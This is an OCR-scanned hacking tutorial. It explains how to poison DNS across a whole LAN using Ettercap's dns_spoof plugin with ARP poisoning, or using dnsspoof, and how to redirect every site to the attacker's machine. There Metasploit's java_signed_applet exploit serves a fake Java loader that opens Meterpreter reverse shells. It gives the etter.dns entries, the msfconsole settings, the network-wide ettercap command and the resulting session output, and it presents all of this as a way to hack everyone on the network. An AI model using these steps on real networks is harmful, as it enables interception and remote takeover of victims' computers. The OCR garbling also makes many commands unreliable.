Introduction: 



Dns Spoofing (Dns Cache Poisoning): 



So Basically a Domain 
Name System Poisoning Attack or Dns Spoofing Is That in 
Which Attacker Is able to redirect a victim to different website 
than the address that he types into his browser. For example a 
user type www.google.com but instead of being directed to 
Google's servers. He Is Instead Send To Another Site Or A 
Fraud Site That Is Managed By The Attacker. 



Ifl'slfel-WMlfl Metasploit is a framework which is used for the 
hacking of different kinds of applications, operating systems, 
web applications etc. Metasploit contains various exploits, 
payloads, modules etc. and in 21st century it is used by most 
of the hackers, security researchers for exploiting different 
kinds of operating systems like windows xp, windows 2003, 
windows vista, windows 8 and etc and it is also called as 
hackers helping hand because by default all is setup already for 
hacking systems and applications and web applications and it is 
also used by security researchers for Pentesting. 



^•Al^lliMMVilNlt^lkll I he Metasploit Project is a computer 
security project which provides information about security 
vulnerabilities and aids in penetration testing and IDS signature 
development. 

Its most well-known sub-project is the open-source Metasploit 
Framework, a tool for developing and executing exploit code 
against a remote target machine. Other important sub-projects 



include the Opcode Database, shell code archive, and security 
research. 



RP Poisoning: 



Address Resolution Protocol Poisoning Is The 

Attack In Which The Mac Address Is Changed By The Attacker. 
It Can Be Effective On Wired or Wireless Networks. In This the 
Attacker Can Stole Passwords Or Steal Data From The 
Compromised Computers and Arp Spoofing or Arp poisoning 
allows attacker to sniff data frames and packets. 



Ettercap: 



|So Ettercap is most popular sniffing tool used by the 
attackers. It has capability of intercepting the packets and 
capture password and other necessary information. 



Process: 



^A/e Are Going to Perform This Attack by Two Ways 
One with Ettercap (pre installed in backtrack) and Other by Dns 
Spoof tool which is too pre install in backtrack and little use of 
the Metasploit to start the java exploit for exploiting our targets 
and in this attack we are going to start the attack on the whole 
LAN so that we can hack everyone's pc who is connected in 
LAN. 



Requirements: 



1. VMware 

2. Backtrack 

3. Ettercap (pre installed) 



4. Dns_spoof plug-in (pre installed) 

5. Dns spoof (pre installed) 

6. Internet Connection 

7. Metasploit (pre installed) 



Step:-1 

Proceeding with our Topic Start Your Backtrack in Vm 
workstation and Then Make Sure Your Backtrack is updated 
Other Wise It Will Give Some Problem So to Update Backtrack 
Operating System Use Command. 

root@bt:^ 



t : -# apt-get update 
t:l http://32.repository.backtrack-lirux.org revolution Release. gpg [198B] 
n http://32.repository.backtrack-linux.org/ revolution/main Translation-enUS 
n http://32.repository.backtrack-linux.org/ revolution/microverse Translation-enUS 
t:2 http://source.repository.backtrack-linux.org revolution Release. gpg [198B] 
n http://source.repository.backtrack-linux.org/ revolution/main Translation-enUS 
n http://source.repository.backtrack-linux.org/ revolution/microverse Translation - en_US 
t:3 http://all.repository.backtrack-linux.org revolution Release. gpg [198B] 
n http://all.repository.backtrack-linux.org/ revolution/main Translation - en_US 
n http://all.repository.backtrack-linux.org/ revolution/microverse Translation - en_US 
n http://32.repository.backtrack-linux.org/ revolution/non - f ree Translation-enUS 
n http://32.repository.backtrack-linux.org/ revolution/testing Translation-enUS 
n http://source.repository.backtrack-linux.org/ revolution/non-free Translation-enUS 
n http://source.repository.backtrack-linux.org/ revolution/testing Translation-enUS 
t:4 http://32.repository.backtrack-linux.org revolution Release [5,Q41B] 
t : 5 http://source.repository.backtrack-linux.org revolution Release [13.5kB] 
n http://all.repository.backtrack-linux.org/ revolution/non-free Translation-enUS 
n http://all.repository.backtrack-linux.org/ revolution/testing Translation-enUS 
t:6 http://all.repository.backtrack-linux.org revolution Release [13.5kB] 
t:7 http://32.repository.backtrack-linux.org revolution/main Packages [4 r 492kB] 
t:8 httpV/source. repository . backtrack-linux.org revolution/main Packages [14B] 
t:9 http://all.repository.backtrack-linux.org revolution/main Packages [3 r 256kB] 
t:10 http://source.repository.backtrack-linux.org revolution/microverse Packages [14B] 
t:ll http://source.repository.backtrack-linux.org revolution/non-free Packages [14B] 
t:12 http://source.repository.backtrack-linux.org revolution/testing Packages [84.6kB] 
[9 Packages 1 , 319kB/3 , 256kB 4B%] [7 Packages 1 , B87kB/4 , 492kB 24%] 



You Will Get a Screen like This 
Step:-2 

We are going to use Dns_spoof plug -in So Now the use of the 
Ettercap is just to help us to use Dns_spoof plug-in and in 



Ettercap. We Will locate the etter.dns file and then edit the 
etter.dns file. In etter.dns file we will enter the site name and 
particular ip address Where our victim will redirect and we will 
use our system ip address so that all of them will be connected 
to us. 



So Now First Of All We Have to locate the etter.dns files. To 
locate the etter.dns File Use Command 



root@bq 



# Locate etter.dns 



A v * rootgeocled: - 

Terminal 



rootfkoded># locate etter.dns 
/usr/local/sfiare/ettercap/etter.dns 
/usr/local/share/videojak/etter.dns 
roo Weeded:** 



So after Locating the Etter.dns. 
Step:-3 

We use command locate etter.dns so to edit the etter.dns we 
are going to use nano command. 



root@bt:~# nano /usr/local/share/Ettercap/etter.dns 



So Now We Are Going to Add URL in (etter.dns) That We 
wants to redirect to our own ip so that victim should connect to 
us. 



# microsoft sucks ; ) 

# redirect it to www.Unux.org 
# 



www.google.com A 192.168.2.5 
*. google. com A 192.168.2.5 

www.google.com PTR 192. 168. 2. 5| # Wildcards in PTR are not allowed 

Now To Save After editing press control + X and then to save 
press y and after press enter. 

And Remember it is not necessary that you use google. co. in to 
be redirected to you router login page you can also use 
facebook.com, Microsoft.com, Bing.com etc. depends upon 
you. 



Step:-4 

Now open the metsploit using command msf console. 
root@bt 



Msf console 




After Successfully Opening Metasploit We Have To Search For 
The java_Signed _applet Use Command 



msf 



Search Java signed applet 



a v x root@bt: " 






File Edit View Terminal Help 






msf > search java signed applet 






Matching Modules 






Name Disclosure Date 


Rank Description 




exploit/nulti/browser/javasignedapplet 1997-B2-19 30:SS:( 


iS UTC excellent Java Signed App 


let Social Engineering Code Execution 


msf > 







After successfully searching the exploit we are going to use 
the exploit. 



msf 



> Use exploit/multi/browser/Java_signed_applet 



a 1 i root@bt: 

File Edit View Term! 




if > use exploit/multi/browser/j ava_ 
isf exploit ( java signed applet ) > \ 



Now set the LHOST Ip address eg. 192. 168.2.5 
set SRVPORT that means server port and URIPATH 
Msf exploit(java_signed_app 
Msf exploit(java_signed_app 



Set LHOST 192.168.2.5 



Set SRVPORT 80 



Msf exploit(java_signed_app| 
Now start the exploit 
Msf exploit(java_signed_app| 



Set URIPATH / 



ixploit 



msf exploit 1 j ava signed applet ] ? exploit 

[*3 Exploit running as background job. 

msf exploit I j ava signed applet ) > 

[*] Started reverse handler on 192.168.2.5:4444 

[*] Using URL: http://S . 8.S.G : 8G/ 

I*J Local IP: http://192. 168.2.5:80/ 

[*] Server started. 



So We Have Started the Server on Our Ip Address 
Step:-5 

Now We Will starts the Dns_spoof plug- in and then redirecting 
the victims and for that use the following command. 



root@bt:~# 



Ettercap -Tqi ethO -P Dns_spoof -M ARP // // 



In the above command, we will be redirecting every user in 
the whole network hence we used ("// //") When it starts 
listing some IPs, it means that it has started to sniff the 
network. You can test it yourself by trying to go to one of the 
websites that you put in the etter.dns file. You should be 
redirected to the Blank window which will ask You to Run an 
Application, and In the above command you will first have to 
confirm that your interface is ethO or some other one so to 
check use command Ifconfig. 



~ y x root@bt: ~ 
File Edit View Terminal Help 




7587 mac vendor fingerprint 
176G tcp OS fingerprint 
2183 known services 




* 


Randomizing 255 hosts for scanning... 

Scanning the whole netmask for 255 hosts... 

* i 


1 t oci i^i 




1 

2 hosts added to the hosts list. . . 


| lOQ . *D 




ARP poisoning victims: 






GROUP 1 : ANY [all the hosts in the list) 






GROUP 2 : ANY (all the hosts in the list) 
Starting Unified sniffing... 






Text only Interface activated... 
Hit "h" for inline help 






Activating dns spoof plugin . . . 







Step:-6 



Process Running on Victim's Pc 



So Now come on the Victim's Machine Suppose the Victim 
Using The Widows 8 and when he open Google.com in his 
browser he will be redirected to our ip on which we have 
started the server! And ask him to install java! Actually it is not 
a java it's a kind of server that we use to get access to 
anyone's pc on the LAN 



<- C 0 www.google.corn 


A* JavafTM) needs your permission to run, 


Run this time 


Always run on this site 





Loading, Please Wait... 



And as he click on run this time there will be a pop up asking 
for the permission to run the java. 



Security Wa mi ng 
Do you want to run this application? 



Name: Site Loader 

Pu blish en UNKNOWN 

From: http : //www . google . corn/Site Loader . jar 



Running this application may be a security risk 

Ris.k: This application will run with unrestricted access which may put your computer and 
personal information at risk. Run this application only if you trust the publisher. 

More Information 

Select the b&x below, then dick Run to start the application 

|^| I accept the risk and want to run this application. Run 

■■^f Show Options 



Cancel 



As Your Victim Click on Run a New Meterpreter Session Will 
Opened. 



Be 



msf exploit [ jaua signed applet ) > 

[*I Started reverse handler on 192.168.2.5:4444 

[*] Using URL: http://8.B.B.B:88/ 

[*] Local IP: http://192. 168.2.5:80/ 

[*] Server started. 

[*I 192.168.2.6 java signed applet - Handling request 

1*1 192.168.2.6 java signed applet - Sending SiteLoader. jar. Waiting for us 

er to click 'accept' . . . 

1*1 192.168.2.6 java_signed_applet - Sending SiteLoader. jar. Waiting for us 
er to click 'accept' . . . 

[*3 Sending stage (752128 bytes) to 192.168.2.6 

[*3 Heterpreter session 1 opened [192.168.2.5:4444 o 192.168.2.6:28426) at 2613 
-86-85 05:50:23 +0530 



Now moving To another Method and This Method 
Probably Works More Better than the Ettercap. 



So Let's Proceed With the Second Method. 



Step:-1 



Create A Text File On The Desktop With The Following Line. 
The Advantage Of This Method Is That In This You Don't Have 
To Type Specific Site To Redirect In This You Just Have To 
add specific ip to txt file to where you want to redirect all 
sites. 



Lines To Be Add In Text File: 



192.168.2.5 * (Your ip on which you started your server) Save 


|lt On Root/Desktop 


■■■■■■■■1 




|:~# dnsspoof -I ethO -f /root/Desktop/spoof.txt 



Step:-2 

Go to Terminal to Start the Dns Spoof Tool Type Command 
root@bt 

-I means = Interface 
-F means= Path of file 
On Victim machine. 



it starts redirecting each site to your ip on which you have 
started the server to hack remote pc. 



fa 


Leading, Pleate Wait... x \ 








C D www.google.com 








JavafTM) needs your permission to run. 


Run this time 




Always run on this site 





Loading, Please Wait.. 



<- G 0 www.facebook.com 



A* Java(TM) needs your permission to run, 


Run this time 


Always run on this site 





Loading : Please Wait... 



So As You See It is Redirecting Every Site The Ip Where We 
Have Started Our Server to Hack Remote PC. 



And as he click on run this time there will be a pop up asking 
for the permission to run the java 



Security Warning 

Do- you want to run this- application? 

Name: SiteLoader 

Publisher: UNKNOWN 

From: http : //www . google . conn /Si "be Loader .jar 

Running this application may b-e a security risk 

Ris.lt: "This application will run with unrestricted access which may put your computer and 
personal information at risk. Run this application only if you trust the publisher. 

More Information 

Select the box below, then click Run to start the application 

| -y | I accept the risk and want to run this application. Run Cancel 

Show Options 





As Your Victim Click on Run a New Meterpreter Session Will Be 
Opened And hence Your Victims On Lan Are Hacked. 




Thanks For Reading 
Regards 
Navdeep sethi 
& 

Manjot Gill 



